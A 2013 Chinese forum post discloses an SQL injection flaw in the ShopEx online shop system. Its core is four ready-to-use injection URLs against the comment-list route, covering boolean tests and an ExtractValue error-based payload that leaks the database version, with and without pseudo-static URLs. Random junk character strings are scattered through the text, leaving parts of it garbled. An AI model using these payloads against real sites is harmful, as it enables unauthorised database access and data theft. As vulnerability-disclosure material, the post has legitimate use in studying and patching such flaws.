注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… S+ M& |+ J+ _& ?7 D2 d& d
/ b4 j( ^$ ^: J" m6 {8 {+ ~. D0 c
好吧,我扯远了~~
# o* `# ?8 r8 g6 p2 t其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~7 g. ]4 n/ B3 y7 `& X+ @: p& x. ?# E
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
# A E) e9 ?# P" v/ m+ v2 @9 e$ O3 y: G: n( ~8 B- i2 r
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html : a0 K! |7 f U! ?% f# F
8 W! v7 Y6 I) b! L- A/ \# a2 Thttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html : ?, p" a! `1 x7 `3 k
3 J) S4 D% l: T. C$ r+ ]http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 9 m( C7 t4 P/ V; [8 }- n
. N: C# h d d% K& |) [* U, ^0 L
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 2 f* O7 \6 q. G! b v2 c1 V9 \
3 ^+ H. M) t7 D! _6 V# g5 l + K* F% c/ i4 d
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。2 h( u3 s. d6 g' s% \9 U0 [
如何注入就不多说了,10多年的东西了…不会也会了… 8 \( I8 D5 Z' p* `( U9 ~. ^
- \; u8 C4 X( z& j9 R1 @2 w8 {
8 D# {9 K: T" I9 T; i r. ?
7 m6 i( |& P/ s7 `' O9 Y" b$ }0 c
. }+ R9 |% g* @
|
发表于 2013-2-19 08:31:27
收藏
支持
反对